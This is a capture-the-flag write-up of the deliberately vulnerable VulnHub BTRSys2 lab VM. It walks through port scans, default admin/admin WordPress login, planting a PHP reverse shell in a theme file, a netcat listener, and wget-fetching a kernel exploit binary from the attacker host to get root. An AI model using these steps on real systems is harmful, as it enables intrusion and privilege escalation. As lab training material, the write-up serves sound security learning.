I want to try bug bounties

Mixing up pentest and tempest when I say it

I hope today's effort leads somewhere in the future. Misuse strictly prohibited.

vulnhub BTRSys2 v2.1 notes

BTRSys2

The .ovf from the Google Drive download did not work properly after extraction.
The .ovf from the vulnhub.com download worked fine.
The VM was not getting an IP address, so at boot I selected "recovery mode" and then "network  Enable networking", and the link came up.

Service enumeration

# nmap -p- 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:21 EDT
Nmap scan report for 10.10.10.13
Host is up (0.00015s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds
# nmap -p21,22,80 -sV --version-all 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:22 EDT
Nmap scan report for 10.10.10.13
Host is up (0.00051s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds
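The two-step pattern above (a full `-p-` sweep first, then `-sV --version-all` only on the ports the sweep found) is easy to chain by parsing nmap's normal output. The following Python is an added example written for this page, not part of the original notes: it parses the two scan outputs shown above (copied inline so it runs offline), builds the `-p` list for the follow-up scan, and derives one searchsploit query per versioned service. The `searchsploit_terms` heuristic (keep the version string up to the first token that starts with a digit) is my own assumption about how much of nmap's version string is useful as a query, not something nmap or searchsploit defines.

```python
import re
from typing import Dict, List

# One nmap "normal output" port line, as printed by both a plain sweep
# ("21/tcp open  ftp") and a -sV scan ("21/tcp open  ftp     vsftpd 3.0.3").
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)

# Scan outputs copied from the notes above so the example runs offline.
SWEEP_OUTPUT = """\
Nmap scan report for 10.10.10.13
Host is up (0.00015s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC)
"""

VERSION_OUTPUT = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""


def open_ports(nmap_output: str) -> List[int]:
    """Open port numbers from nmap normal output, in the order printed."""
    ports = []
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group("state") == "open":
            ports.append(int(m.group("port")))
    return ports


def version_scan_argv(sweep_output: str, target: str) -> List[str]:
    """argv for the follow-up scan: version-probe only the ports the sweep found."""
    spec = ",".join(str(p) for p in open_ports(sweep_output))
    return ["nmap", "-p" + spec, "-sV", "--version-all", target]


def service_versions(nmap_output: str) -> Dict[int, Dict[str, str]]:
    """Map open port -> {'service', 'version'} from -sV output (version may be '')."""
    found: Dict[int, Dict[str, str]] = {}
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group("state") == "open":
            found[int(m.group("port"))] = {
                "service": m.group("service"),
                "version": m.group("version") or "",
            }
    return found


def searchsploit_terms(nmap_output: str) -> List[str]:
    """One searchsploit query per versioned service.

    Heuristic (an assumption of this example, not nmap's): keep the version
    string up to and including the first token that starts with a digit, so
    'OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (...)' becomes 'OpenSSH 7.2p2' and
    'Apache httpd 2.4.18 ((Ubuntu))' becomes 'Apache httpd 2.4.18'.
    """
    terms = []
    for _port, info in sorted(service_versions(nmap_output).items()):
        tokens = info["version"].split()
        if not tokens:
            continue  # sweep-only line, nothing to query yet
        cut = len(tokens)
        for i, tok in enumerate(tokens):
            if tok[0].isdigit():
                cut = i + 1
                break
        terms.append(" ".join(tokens[:cut]))
    return terms


if __name__ == "__main__":
    print(" ".join(version_scan_argv(SWEEP_OUTPUT, "10.10.10.13")))
    for term in searchsploit_terms(VERSION_OUTPUT):
        print("searchsploit", term)
```

Run stand-alone it prints the exact second nmap command used above and three searchsploit queries; the vsftpd query reproduces the search in the next section, and the same parser works on any nmap normal-output file saved with `-oN`.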

Points of interest

Details

[port 21] ftp vsftpd 3.0.3

# searchsploit vsftpd
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption               | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)               | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)               | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                             | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                       | exploits/unix/remote/17491.rb
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Nothing in particular.

# ftp 10.10.10.13
Connected to 10.10.10.13.
220 (vsFTPd 3.0.3)
Name (10.10.10.13:root): 
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> ls
530 Please login with USER and PASS.

Login required, so stopping here.

[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

I've seen this version before too; as I recall the only exploit is Username Enumeration and its accuracy was low.
Done.

[port 80] http Apache httpd 2.4.18 (Ubuntu)

# nikto -h 10.10.10.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.13
+ Target Hostname:    10.10.10.13
+ Target Port:        80
+ Start Time:         2020-05-11 07:30:36 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 51, size: 54e208f152180, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7865 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-11 07:31:40 (GMT-4) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

robots.txt looks interesting.

# dirb http://10.10.10.13

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 11 07:32:16 2020
URL_BASE: http://10.10.10.13/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.13/ ----
+ http://10.10.10.13/index.html (CODE:200|SIZE:81)                                                                   
==> DIRECTORY: http://10.10.10.13/javascript/                                                                        
+ http://10.10.10.13/LICENSE (CODE:200|SIZE:1672)                                                                    
+ http://10.10.10.13/robots.txt (CODE:200|SIZE:1451)                                                                 
+ http://10.10.10.13/server-status (CODE:403|SIZE:299)                                                               
==> DIRECTORY: http://10.10.10.13/upload/                                                                            
==> DIRECTORY: http://10.10.10.13/wordpress/                                                                         
                                                                                                                     
---- Entering directory: http://10.10.10.13/javascript/ ----
==> DIRECTORY: http://10.10.10.13/javascript/jquery/                                                                 
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/ ----
==> DIRECTORY: http://10.10.10.13/upload/account/                                                                    
==> DIRECTORY: http://10.10.10.13/upload/admins/                                                                     
==> DIRECTORY: http://10.10.10.13/upload/framework/                                                                  
==> DIRECTORY: http://10.10.10.13/upload/include/                                                                    
+ http://10.10.10.13/upload/index.php (CODE:500|SIZE:67)                                                             
==> DIRECTORY: http://10.10.10.13/upload/languages/                                                                  
==> DIRECTORY: http://10.10.10.13/upload/media/                                                                      
==> DIRECTORY: http://10.10.10.13/upload/modules/                                                                    
==> DIRECTORY: http://10.10.10.13/upload/page/                                                                       
==> DIRECTORY: http://10.10.10.13/upload/search/                                                                     
==> DIRECTORY: http://10.10.10.13/upload/temp/                                                                       
==> DIRECTORY: http://10.10.10.13/upload/templates/                                                                  
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/ ----
+ http://10.10.10.13/wordpress/index.php (CODE:301|SIZE:0)                                                           
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/                                                                
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/                                                              
==> DIRECTORY: http://10.10.10.13/wordpress/wp-includes/                                                             
+ http://10.10.10.13/wordpress/xmlrpc.php (CODE:200|SIZE:42)                                                         
                                                                                                                     
---- Entering directory: http://10.10.10.13/javascript/jquery/ ----
+ http://10.10.10.13/javascript/jquery/jquery (CODE:200|SIZE:284394)                                                 
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/account/ ----
==> DIRECTORY: http://10.10.10.13/upload/account/css/                                                                
+ http://10.10.10.13/upload/account/index.php (CODE:500|SIZE:67)                                                     
==> DIRECTORY: http://10.10.10.13/upload/account/templates/                                                          
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/ ----
==> DIRECTORY: http://10.10.10.13/upload/admins/access/                                                              
==> DIRECTORY: http://10.10.10.13/upload/admins/addons/                                                              
==> DIRECTORY: http://10.10.10.13/upload/admins/admintools/                                                          
==> DIRECTORY: http://10.10.10.13/upload/admins/groups/                                                              
+ http://10.10.10.13/upload/admins/index.php (CODE:500|SIZE:67)                                                      
==> DIRECTORY: http://10.10.10.13/upload/admins/interface/                                                           
==> DIRECTORY: http://10.10.10.13/upload/admins/languages/                                                           
==> DIRECTORY: http://10.10.10.13/upload/admins/login/                                                               
==> DIRECTORY: http://10.10.10.13/upload/admins/logout/                                                              
==> DIRECTORY: http://10.10.10.13/upload/admins/media/                                                               
==> DIRECTORY: http://10.10.10.13/upload/admins/modules/                                                             
==> DIRECTORY: http://10.10.10.13/upload/admins/pages/                                                               
==> DIRECTORY: http://10.10.10.13/upload/admins/preferences/                                                         
==> DIRECTORY: http://10.10.10.13/upload/admins/profiles/                                                            
==> DIRECTORY: http://10.10.10.13/upload/admins/service/                                                             
==> DIRECTORY: http://10.10.10.13/upload/admins/settings/                                                            
==> DIRECTORY: http://10.10.10.13/upload/admins/start/                                                               
==> DIRECTORY: http://10.10.10.13/upload/admins/support/                                                             
==> DIRECTORY: http://10.10.10.13/upload/admins/templates/                                                           
==> DIRECTORY: http://10.10.10.13/upload/admins/users/                                                               
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/framework/ ----
==> DIRECTORY: http://10.10.10.13/upload/framework/functions/                                                        
+ http://10.10.10.13/upload/framework/index.php (CODE:500|SIZE:67)                                                   
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/include/ ----
+ http://10.10.10.13/upload/include/index.php (CODE:500|SIZE:67)                                                     
==> DIRECTORY: http://10.10.10.13/upload/include/yui/                                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/languages/ ----
+ http://10.10.10.13/upload/languages/index.php (CODE:500|SIZE:67)                                                   
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/media/ ----
+ http://10.10.10.13/upload/media/index.php (CODE:500|SIZE:67)                                                       
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/ ----
+ http://10.10.10.13/upload/modules/admin.php (CODE:500|SIZE:67)                                                     
+ http://10.10.10.13/upload/modules/index.php (CODE:500|SIZE:67)                                                     
==> DIRECTORY: http://10.10.10.13/upload/modules/news/                                                               
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/                                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/page/ ----
+ http://10.10.10.13/upload/page/index.php (CODE:500|SIZE:67)                                                        
==> DIRECTORY: http://10.10.10.13/upload/page/posts/                                                                 
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/search/ ----
+ http://10.10.10.13/upload/search/index.php (CODE:500|SIZE:67)                                                      
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/temp/ ----
+ http://10.10.10.13/upload/temp/index.php (CODE:500|SIZE:67)                                                        
==> DIRECTORY: http://10.10.10.13/upload/temp/search/                                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/templates/ ----
==> DIRECTORY: http://10.10.10.13/upload/templates/blank/                                                            
+ http://10.10.10.13/upload/templates/index.php (CODE:500|SIZE:67)                                                   
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/ ----
+ http://10.10.10.13/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                  
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/css/                                                            
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/images/                                                         
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/includes/                                                       
+ http://10.10.10.13/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                  
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/js/                                                             
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/maint/                                                          
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/network/                                                        
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/user/                                                           
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-content/ ----
+ http://10.10.10.13/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/plugins/                                                      
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/themes/                                                       
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/upgrade/                                                      
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/uploads/                                                      
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/account/css/ ----
+ http://10.10.10.13/upload/account/css/index.php (CODE:500|SIZE:67)                                                 
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/account/templates/ ----
+ http://10.10.10.13/upload/account/templates/index.php (CODE:500|SIZE:67)                                           
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/access/ ----
+ http://10.10.10.13/upload/admins/access/index.php (CODE:500|SIZE:67)                                               
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/addons/ ----
+ http://10.10.10.13/upload/admins/addons/index.php (CODE:500|SIZE:67)                                               
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/admintools/ ----
+ http://10.10.10.13/upload/admins/admintools/index.php (CODE:500|SIZE:67)                                           
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/groups/ ----
+ http://10.10.10.13/upload/admins/groups/index.php (CODE:500|SIZE:67)                                               
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/interface/ ----
+ http://10.10.10.13/upload/admins/interface/index.php (CODE:500|SIZE:67)                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/languages/ ----
+ http://10.10.10.13/upload/admins/languages/index.php (CODE:500|SIZE:67)                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/login/ ----
==> DIRECTORY: http://10.10.10.13/upload/admins/login/forgot/                                                        
+ http://10.10.10.13/upload/admins/login/index.php (CODE:500|SIZE:67)                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/logout/ ----
+ http://10.10.10.13/upload/admins/logout/index.php (CODE:500|SIZE:67)                                               
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/media/ ----
+ http://10.10.10.13/upload/admins/media/index.php (CODE:500|SIZE:67)                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/modules/ ----
+ http://10.10.10.13/upload/admins/modules/index.php (CODE:500|SIZE:67)                                              
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/pages/ ----
+ http://10.10.10.13/upload/admins/pages/index.php (CODE:500|SIZE:67)                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/preferences/ ----
+ http://10.10.10.13/upload/admins/preferences/index.php (CODE:500|SIZE:67)                                          
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/profiles/ ----
+ http://10.10.10.13/upload/admins/profiles/index.php (CODE:500|SIZE:0)                                              
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/service/ ----
+ http://10.10.10.13/upload/admins/service/index.php (CODE:500|SIZE:67)                                              
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/settings/ ----
+ http://10.10.10.13/upload/admins/settings/index.php (CODE:500|SIZE:67)                                             
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/start/ ----
+ http://10.10.10.13/upload/admins/start/index.php (CODE:500|SIZE:67)                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/support/ ----
+ http://10.10.10.13/upload/admins/support/index.php (CODE:500|SIZE:67)                                              
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/templates/ ----
+ http://10.10.10.13/upload/admins/templates/index.php (CODE:500|SIZE:67)                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/users/ ----
+ http://10.10.10.13/upload/admins/users/index.php (CODE:500|SIZE:67)                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/framework/functions/ ----
+ http://10.10.10.13/upload/framework/functions/index.php (CODE:500|SIZE:67)                                         
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/include/yui/ ----
==> DIRECTORY: http://10.10.10.13/upload/include/yui/event/                                                          
+ http://10.10.10.13/upload/include/yui/index.php (CODE:500|SIZE:67)                                                 
+ http://10.10.10.13/upload/include/yui/README (CODE:200|SIZE:8488)                                                  
==> DIRECTORY: http://10.10.10.13/upload/include/yui/yahoo/                                                          
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/news/ ----
==> DIRECTORY: http://10.10.10.13/upload/modules/news/css/                                                           
+ http://10.10.10.13/upload/modules/news/index.php (CODE:500|SIZE:67)                                                
+ http://10.10.10.13/upload/modules/news/info.php (CODE:500|SIZE:67)                                                 
==> DIRECTORY: http://10.10.10.13/upload/modules/news/languages/                                                     
==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/                                                     
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/index.php (CODE:500|SIZE:67)                                             
+ http://10.10.10.13/upload/modules/wysiwyg/info.php (CODE:500|SIZE:67)                                              
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/languages/                                                  
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/templates/                                                  
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/page/posts/ ----
+ http://10.10.10.13/upload/page/posts/index.php (CODE:302|SIZE:0)                                                   
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/temp/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/templates/blank/ ----
+ http://10.10.10.13/upload/templates/blank/index.php (CODE:500|SIZE:67)                                             
+ http://10.10.10.13/upload/templates/blank/info.php (CODE:500|SIZE:67)                                              
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/network/ ----
+ http://10.10.10.13/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                          
+ http://10.10.10.13/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                          
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/user/ ----
+ http://10.10.10.13/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                             
+ http://10.10.10.13/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                             
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-content/plugins/ ----
+ http://10.10.10.13/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                        
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-content/themes/ ----
+ http://10.10.10.13/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                         
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/login/forgot/ ----
+ http://10.10.10.13/upload/admins/login/forgot/index.php (CODE:500|SIZE:67)                                         
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/include/yui/event/ ----
+ http://10.10.10.13/upload/include/yui/event/index.php (CODE:500|SIZE:67)                                           
+ http://10.10.10.13/upload/include/yui/event/README (CODE:200|SIZE:9807)                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/include/yui/yahoo/ ----
+ http://10.10.10.13/upload/include/yui/yahoo/index.php (CODE:500|SIZE:67)                                           
+ http://10.10.10.13/upload/include/yui/yahoo/README (CODE:200|SIZE:2889)                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/news/css/ ----
+ http://10.10.10.13/upload/modules/news/css/index.php (CODE:500|SIZE:67)                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/news/languages/ ----
+ http://10.10.10.13/upload/modules/news/languages/index.php (CODE:500|SIZE:67)                                      
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/news/templates/ ----
==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/backend/                                             
+ http://10.10.10.13/upload/modules/news/templates/index.php (CODE:500|SIZE:67)                                      
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/languages/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/languages/index.php (CODE:500|SIZE:67)                                   
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/templates/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/templates/index.php (CODE:500|SIZE:67)                                   
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/news/templates/backend/ ----
+ http://10.10.10.13/upload/modules/news/templates/backend/index.php (CODE:500|SIZE:67)                              
                                                                                                                     
-----------------
END_TIME: Mon May 11 07:34:12 2020
DOWNLOADED: 267496 - FOUND: 71

Unusually, the dirb results carry a lot of information.
The two directories that stand out are "/upload/" and "/wordpress/".
First, check "/robots.txt".

# curl 10.10.10.13/robots.txt
Disallow: Hackers
Allow: /wordpress/


 .o+.                    :o/                                                   -o+`                
  /hh:                    shh`                                                  +hh-                
  /hh:                    shh`                         -/:                      +hh-                
  /hh:                    shh`                         +s+                      +hh-                
  /hh/............   `....shh-....   ...............`  `-`   `..............`   +hh-          ..    
  /hhyyyyyyyyyyyyy/ `syyyyyhhyyyyy. -yyyyyyyyyyyyyyy/  oys   +ssssssssssssss/   +hh-        .+yy-   
  /hh+---------/hh+  .----yhh:----  :hho------------`  yhy`  oyy------------`   +hh-      .+yys:`   
  /hh:         -hh+       shh`      :hh+               yhy`  oyy                +hh-   `.+yys/`     
  /hh:         -hh+       shh`      :hh+               yhy`  oss          `--   +hhsssssyhy/`       
  /hh:         -hh+       shh`      :hh+               yhy`  `-.          +yy.  +hho+++osyy+.       
  /hh:         -hh+       shh`      :hh+               yhy`               +yy.  +hh-    `/syy+.     
  /hho:::::::::+hh+       shh`      :hh+               yhy`  .::::::::::::oyy.  +hh-      `/yyy/`   
  :yyyyyyyyyyyyyyy:       +ys`      .yy:               oys   +sssssssssssssss`  /ys.        `/sy-   
   ```````````````         `         ``                 `     ``````````````     ``                

Nothing new learned here.
Opening the home page in a browser again shows a gif with something squirming around.
Accessing "/upload/" gives:

Connection failed: SQLSTATE[HY000] [1049] Unknown database 'Lepton'

Is the PHP-to-MySQL connection failing?
Either way, it seems "/upload/" can't be used any further.
So, check "/wordpress/".
The page that comes up doesn't seem to load the normal WordPress design?

Log in , admin

There is a "Log in" link, so try logging in with "admin/admin".
Ah, that apparently logged in, so edit a PHP file that looks easy to reach via Appearance -> Editor.
A matter of taste, but I like putting the reverse shell in search.php because it is easy to follow.
The reverse shell is the pentestmonkey one I always rely on.
On Kali it is at "/usr/share/webshells/php/php-reverse-shell.php".
This time "search.php" didn't work (by design?), so I modified "comment.php" for the reverse shell instead.

window 1

# nc -nlvp 8080
From Firefox, post a comment on any article.
window 1

Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 14:43:02 up  1:24,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$

shell getchu!

after shell getchu

kernel exploit

No suspicious files found at all, and nothing notable in cron either.
No choice but to go for a kernel exploit.

victim

$ uname -a
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
attacker

# searchsploit ubuntu 4.4
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation          | exploits/linux/local/41458.c
(snip)
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation       | exploits/linux/local/44298.c

The ones that looked likely to land.
Try "41458.c".

$ cd /tmp
$ ls
systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU
$ wget 10.10.10.3/41458.c
--2020-05-11 15:17:10--  http://10.10.10.3/41458.c
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16554 (16K) [text/plain]
Saving to: '41458.c'

     0K .......... ......                                     100% 46.3M=0s

2020-05-11 15:17:10 (46.3 MB/s) - '41458.c' saved [16554/16554]

$ ls
41458.c
systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU
$ gcc 41458.c
/bin/sh: 7: gcc: not found

Huh, no gcc.
Download a precompiled binary then.

$ wget 10.10.10.3/a.out
--2020-05-11 15:18:07--  http://10.10.10.3/a.out
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23776 (23K) [application/octet-stream]
Saving to: 'a.out'

     0K .......... .......... ...                             100% 68.2M=0s

2020-05-11 15:18:07 (68.2 MB/s) - 'a.out' saved [23776/23776]

$ chmod 777 a.out
$ ./a.out
bash: cannot set terminal process group (1374): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)

Incidentally, this caused a kernel panic afterwards.
Maybe because I ran it from that tty?
"/usr/share/exploitdb/exploits/linux/local/44298.c" also got root,
and that one did not cause a kernel panic.
